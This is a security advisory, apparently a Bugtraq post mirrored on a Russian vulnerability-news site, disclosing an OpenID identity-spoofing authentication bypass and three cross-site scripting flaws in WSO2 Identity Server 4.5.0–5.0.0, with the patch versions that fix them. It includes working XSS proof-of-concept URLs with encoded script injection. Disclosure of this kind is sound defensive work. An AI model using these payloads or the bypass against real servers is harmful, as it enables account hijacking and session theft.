Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  [USN-2558-1] Mailman vulnerability

  Manage Engine Desktop Central 9 - CVE-2015-2560 - Unauthorised administrative password reset

  [ MDVSA-2015:087 ] egroupware

  [ MDVSA-2015:097 ] php-ZendFramework

From:Bartlomiej Balcerek <Bartlomiej.Balcerek_(at)_pwr.edu.pl>
Date:12 мая 2015 г.
Subject:WSO2 Identity Server multiple vulnerabilities



Hi,

WSO2 Identity Server (http://wso2.com/products/identity-server/) version
4.5.0/4.6.0/5.0.0 is prone to multiple vulnerabilities, including
authentication bypass.

Timeline:

09.10.2014 - Vendor notified
22.11.2014 - Vendor confirmed
04.12.2014 - Patches released
25.03.2015 - Bugtraq disclosure

Vulnerable versions:

IS 4.5.0
IS 4.6.0
IS 5.0.0

Fixed versions:

IS 4.5.0 + WSO2-CARBON-PATCH-4.2.0-0932
IS 4.6.0 + WSO2-CARBON-PATCH-4.2.0-0933
IS 5.0.0 + WSO2-CARBON-PATCH-4.2.0-0930
IS 5.0.0 + Service Pack 1

Vulnerabilities details:

1) Identity spoofing/authentication bypass.  Attacker need to log in to
WSO2 IS to obtain valid HTTP session. Given this session he/she can
request OpenID assertion from WSO2 IS to _any_ identity
(openid.identity). Thus any authenticated user is able to spoof any
identity he/she requests, in order to login to RP as user of his/her will.

2) XSS A - HTML injection

https:
//<wso2is_address>/openid/%3cIMG%20SRC%3d%22a%22%20
onerror=alert(%22XSS%22)%3e

3) XSS B - HTML injection

https://<wso2is_address>/authenticationendpoint/login.do?openid.
ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.
mode=checkid_setup&openid.return_to=http://example.com&openid.realm=http:
//example.com&openid.ns.ax=http%3A%2F%2Fopenid.
net%2Fsrv%2Fax%2F1.0&openid.ax.mode=fetch_request&openid.
identity=https://example.com/test&openid.claimed_id=https://example.
com/test&relyingParty=https://ww.wp.pl&sessionDataKey=186f35c3-f2a3-49bf-
8bb2-
7b6a1e%27%2f%3e%3c%73%63%72%69%70%74%
3eeval("ale"%2b"rt(1)")%3c%2f%
73%63%72%69%70%74%3e&type=openid&commonAuthCaller
Path=%2Fopenidserver&username=test&authenticators=BasicAuthenticator:
LOCAL

4) XSS C - JavaScript injection

https://<wso2is_address>/authenticationendpoint/login.do?openid.
ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.
mode=checkid_setup&openid.return_to=http://example.com&openid.realm=http:
//example.com&openid.ns.ax=http%3A%2F%2Fopenid.
net%2Fsrv%2Fax%2F1.0&openid.ax.mode=fetch_request&openid.
identity=https://example.com/test&openid.claimed_id=https://example.
com/test&relyingParty=https://ww.wp.pl&sessionDataKey=186f35c3-f2a3-49bf-
8bb2-7b6a1e-
aaa"%0a};alert(1);%0aif(0){"&type=openid&
commonAuthCallerPath=%2Fopenidserver&username=test&authenticators=Bas
icAuthenticator:LOCAL

regards
-- Bartlomiej Balcerek WCSS CSIRT Wroclaw Centre for Networking and Supercomputing Wroclaw University of Technology, Poland phone: +48 (71) 320-20-79 mail: [email protected]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород